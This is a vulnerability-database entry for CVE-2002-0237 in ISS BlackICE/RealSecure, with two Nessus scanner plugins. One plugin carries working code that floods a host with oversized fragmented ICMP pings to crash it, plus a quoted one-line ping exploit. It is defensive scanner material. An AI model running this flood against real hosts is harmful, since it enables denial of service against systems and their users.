Vulnerabilities > CVE-2002-0237 - Buffer Overflow vulnerability in ISS products

CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
iss
nessus

Summary

Buffer overflow in ISS BlackICE Defender 2.9 and earlier, BlackICE Agent 3.0 and 3.1, and RealSecure Server Sensor 6.0.1 and 6.5 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a flood of large ICMP ping packets.

Nessus

  • NASL familyFirewalls
    NASL idBLACKICE_DOS.NASL
    descriptionThe remote host appears to be running either BlackICE or RealSecure Server Sensor. This application has a remote buffer overflow vulnerability. It was possible to crash the application by flooding it with 10 KB ping packets. A remote attacker could exploit this to cause a denial of service, or potentially execute arbitrary code.
    last seen2020-06-01
    modified2020-06-02
    plugin id10927
    published2002-03-29
    reporterThis script is Copyright (C) 2002-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/10927
    titleISS BlackICE / RealSecure Large ICMP Ping Packet Overflow DoS
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    # TBD : eEye gives this "exploit": ping -s 60000 -c 16 -p CC 1.1.1.1
    #       But according to others, it doesn't work.
    
    
    include("compat.inc");
    
    
    if (description)
    {
      # Plugin identity and the public identifiers it maps to.
      script_id(10927);
      script_version("1.33");
      script_cve_id("CVE-2002-0237");
      script_bugtraq_id(4025);

      script_name(english:"ISS BlackICE / RealSecure Large ICMP Ping Packet Overflow DoS");
      script_summary(english:"Ping flood the remote machine and kills BlackICE");

      # Report text. NOTE(review): it speaks of "10 KB" pings, whereas the
      # plugin body below defaults to 60000-byte echo requests.
      script_set_attribute(attribute:"synopsis", value:
    "The application running on the remote host has a remote buffer
    overflow vulnerability." );
      script_set_attribute(attribute:"description", value:
    "The remote host appears to be running either BlackICE or RealSecure
    Server Sensor.
    
    This application has a remote buffer overflow vulnerability.  It was
    possible to crash the application by flooding it with 10 KB ping
    packets.
    
    A remote attacker could exploit this to cause a denial of service, or
    potentially execute arbitrary code." );

      # Bugtraq discussion threads plus a web.archive.org copy of the ISS advisory.
      script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Feb/37");
      script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Feb/51");
      script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Feb/48");
      script_set_attribute(attribute:"see_also", value:"http://web.archive.org/web/20131113184518/http://www.iss.net:80/threats/advise109.html");
      script_set_attribute(attribute:"solution", value:"Apply the appropriate patch referenced in the ISS advisory.");

      # CVSSv2 scoring (7.5) and exploit metadata: no public exploit is known.
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
      script_set_attribute(attribute:"plugin_publication_date", value:"2002/03/29");
      script_set_attribute(attribute:"vuln_publication_date", value:"2002/02/04");
      script_cvs_date("Date: 2019/03/06 18:38:55");

      # Flagged as a potential vulnerability only: the body infers success from
      # the host going silent after the flood, not from observing the
      # application itself crash.
      script_set_attribute(attribute:"potential_vulnerability", value:"true");
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_end_attributes();

      # Destructive category. ACT_FLOOD is used when this engine defines it;
      # presumably a compatibility shim for engines that only know ACT_KILL_HOST.
      if (ACT_FLOOD) script_category(ACT_FLOOD);
      else script_category(ACT_KILL_HOST);

      script_copyright(english:"This script is Copyright (C) 2002-2019 Tenable Network Security, Inc.");
      script_family(english:"Firewalls");

      # The tunables were never exposed as preferences; the body hard-codes them.
      #script_add_preference(name:"Flood length :", type:"entry", value:"600");
      #script_add_preference(name:"Data length :", type:"entry", value:"10000");

      # Only scheduled when the scan carries both opt-in settings; the body
      # re-checks their values before sending anything.
      script_require_keys("Settings/ThoroughTests", "Settings/ParanoidReport");
      exit(0);
    }
    
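    include("global_settings.inc");

    # IPv4-only: the flood is hand-built with forge_ip_packet()/forge_icmp_packet()
    # (ip_v:4), so there is nothing to do against an IPv6 target.
    if ( TARGET_IS_IPV6 ) exit(0);

    # Destructive check -- it deliberately tries to crash the remote host.
    # Run it only when the user opted in to both thorough tests and paranoid
    # reporting (the description block requires the keys; this checks values).
    if (! thorough_tests || report_paranoia < 2) exit(0);

    #
    # The script code starts here
    #

    # Record the host's reachability before the flood so end_denial() can tell
    # whether it stopped answering afterwards.
    start_denial();

    # fl: number of echo requests to send; dl: size of each one in bytes of IP
    # payload (ICMP header + data). The preference hooks are kept commented out
    # as shipped, so the defaults always apply.
    # NOTE(review): the plugin description talks about "10 KB" pings, but the
    # default below is 60000 bytes.
    #fl = script_get_preference("Flood length :");
    if (! fl) fl = 600;
    #dl = script_get_preference("Data length :");
    if (! dl) dl = 60000;

    # Fragment each ping at the path MTU (Ethernet's 1500 when none was
    # learned) so the oversized echo request is reassembled only on the target.
    mtu = get_kb_item('ICMP/PMTU');
    if (! mtu) mtu = get_kb_item('TCP/PMTU');
    if (! mtu) mtu = 1500;

    # Payload per fragment: MTU minus the IP and ICMP headers, rounded down to
    # a multiple of 8 because IP fragment offsets are counted in 8-byte units.
    maxdata = mtu - 20 - 8;	# IP + ICMP
    maxdata = maxdata / 8; maxdata = maxdata * 8;
    # Guard against a bogus or tiny PMTU value. 544 is presumably derived from
    # the 576-byte IPv4 minimum datagram (576 - 28 = 548, rounded down to 8).
    if (maxdata < 16) maxdata = 544;

    # Packets are sourced from the scanner and aimed at the scan target; both
    # are passed explicitly below instead of relying on forge_ip_packet()'s
    # defaults (the original computed them and then never used them).
    src = compat::this_host();
    dst = get_host_ip();
    id = 666;
    seq = 0;

    for (i = 0; i < fl; i = i + 1)
    {
      # One IP identification per echo request: every fragment of the same
      # request shares it so the target can reassemble them.
      id = id + 1;
      seq = seq + 1;
      for (j = 0; j < dl; j = j + maxdata)
      {
        datalen = dl - j;
        o = j / 8;              # fragment offset, in 8-byte units
        if (datalen > maxdata) {
          o = o | 0x2000;       # MF flag: more fragments follow
          datalen = maxdata;
        }
        # forge_icmp_packet() always prepends an 8-byte echo header, so only
        # datalen - 8 bytes of filler are needed. Clamp at zero so a trailing
        # fragment shorter than that header never asks crap() for a negative
        # length (only reachable if dl is not a multiple of 8).
        fill_len = datalen - 8;
        if (fill_len < 0) fill_len = 0;

        ip = forge_ip_packet(ip_v:4, ip_hl:5, ip_tos:0, ip_off:o,
                             ip_p:IPPROTO_ICMP, ip_id:id, ip_ttl:0x40,
                             ip_src:src, ip_dst:dst);
        icmp = forge_icmp_packet(ip:ip, icmp_type:8, icmp_code:0,
                                 icmp_seq:seq, icmp_id:seq, data:crap(fill_len));
        # Fire and forget: replies are not captured or inspected.
        send_packet(icmp, pcap_active: 0);
      }
    }

    # If the host no longer answers after the flood, report. This is a generic
    # "target went silent" signal, not proof that BlackICE/RealSecure crashed,
    # which is why the plugin is marked potential_vulnerability.
    alive = end_denial();
    if (! alive) {
      security_hole();
      set_kb_item(name:"Host/dead", value:TRUE);
    }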
    
    
  • NASL familyWindows
    NASL idBLACKICE_VERSION_CHECKER.NASL
    descriptionISS BlackICE is a personal firewall/IDS for Windows desktops. Several remote holes have been found in the product. An attacker exploiting these flaws would be able to either crash the remote firewall/IDS service or execute code on the target machine. According to the remote version number, the remote host is vulnerable to at least one remote overflow.
    last seen2020-06-01
    modified2020-06-02
    plugin id12114
    published2004-03-19
    reporterThis script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/12114
    titleISS BlackICE Multiple Remote Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      # Plugin identity. One version check covers several BlackICE flaws,
      # hence the list of CVE and Bugtraq identifiers.
      script_id(12114);
      script_version("1.30");
      script_cvs_date("Date: 2018/06/27 18:42:27");

      script_cve_id(
        "CVE-2000-0562",
        "CVE-2002-0237",
        "CVE-2002-0956",
        "CVE-2002-0957",
        "CVE-2004-0193",
        "CVE-2004-2125",
        "CVE-2004-2126"
      );
      script_bugtraq_id(1389, 4025, 4950, 9513, 9514, 9752);

      script_name(english:"ISS BlackICE Multiple Remote Vulnerabilities");
      script_summary(english:"ISS BlackICE Vulnerable version detection");

      # Report text shown for any of the version matches in the body.
      script_set_attribute(attribute:"synopsis", value:
    "The firewall running on the remote host has multiple buffer overflow
    vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "ISS BlackICE is a personal Firewall/IDS for windows Desktops. Several
    remote holes have been found in the product. An attacker, exploiting
    these flaws, would be able to either crash the remote firewall/IDS
    service or execute code on the target machine.
    
    According to the remote version number, the remote host is vulnerable
    to at least one remote overflow.");

      # eEye advisories from Feb/Mar 2004; presumably the SMB and ICQ parsing
      # overflows the body checks for.
      script_set_attribute(attribute:"see_also", value:"http://www.eeye.com/html/Research/Advisories/AD20040226.html");
      script_set_attribute(attribute:"see_also", value:"http://www.eeye.com/html/Research/Advisories/AD20040318.html");
      script_set_attribute(attribute:"solution", value:"Upgrade to the latest version of BlackICE.");

      # CVSSv2 full C/I/A impact, presumably scored for the worst of the covered
      # issues -- higher than CVE-2002-0237's own 7.5.
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");

      script_set_attribute(attribute:"vuln_publication_date", value:"2000/06/20");
      script_set_attribute(attribute:"plugin_publication_date", value:"2004/03/19");

      # Non-intrusive: the verdict comes from a version string that
      # blackice_configs.nasl reads over SMB, not from sending attack traffic.
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"patch_publication_date", value:"2004/02/26");
      script_end_attributes();

      script_category(ACT_GATHER_INFO);
      script_family(english:"Windows");

      script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");

      # Needs the version KB entry the dependency populates, over SMB.
      script_dependencies("blackice_configs.nasl");
      script_require_keys("SMB/BlackICE/Version");
      script_require_ports(139, 445);

      exit(0);
    }
    
    include("smb_func.inc");

    # Version line harvested from BLACKD.LOG by blackice_configs.nasl; nothing
    # to decide if it was never collected.
    banner = get_kb_item("SMB/BlackICE/Version");
    if ( ! banner ) exit(0);


    # what does the logfile format look like:
    # ---------- BLACKD.LOG
    # [25]Fri, 19 Mar 2004 09:58:20: BlackICE Product Version :               7.0.ebf

    if (strstr(banner, "BlackICE Product Version"))  {
        # Every finding is attributed to the SMB transport the banner came over.
        port = kb_smb_transport();
        if (!port) port = 139;

        # 1. SMB parsing overflow: 7.0 eba..ebh and 3.6 ebr..ecb.
        if (egrep(string:banner, pattern:"BlackICE Product Version.*(7\.0\.eb[a-h]|3\.6\.e(b[r-z]|c[ab]))")) {
            report = string(
    "According to the remote version number, the remote host is vulnerable
    to a bug wherein a malformed SMB packet will allow the attacker to execute
    arbitrary code on the target system.");
            security_hole(port:port, extra:report);
        }


        # 2. ICQ parsing overflow: "all versions prior to 7.0.ebl and 3.6.ecf".
        # NOTE(review): the patterns do not implement that statement exactly.
        # The first one flags every 0.x-6.x build, including 3.6.ecf and later
        # (builds the third check below knows about), and the 7.0 alternative
        # stops at 7.0.ebh rather than 7.0.ebk. Confirm the affected ranges
        # against the advisories before tightening either branch.
        icq_pre7 = egrep(string:banner, pattern:"BlackICE Product Version.*[0-6]\.[0-9]\.[a-z][a-z][a-z]");
        icq_v7   = egrep(string:banner, pattern:"BlackICE Product Version.*7\.0\.([a-d][a-z][a-z]|e(a[a-z]|b[a-h]))");
        if (icq_pre7 || icq_v7) {
            report = string(
    "According to the remote version number, the remote host is vulnerable
    to a bug wherein a malformed ICQ packet will allow the attacker to execute
    arbitrary code on the target system.");
            security_hole(port:port, extra:report);
        }


        # 3. Insecure default configuration, only in these builds:
        #    7.0 ebj..ebm, 3.6 ecd..ecg, 3.6 ccd..ccg
        if (egrep(string:banner, pattern:"BlackICE Product Version.*(7\.0\.eb[j-m]|3\.6\.(ec[d-g]|cc[d-g]))")) {
            report = string(
    "Nessus detected a version of BlackICE with insecure default settings.");
            security_hole(port:port, extra:report);
        }

    }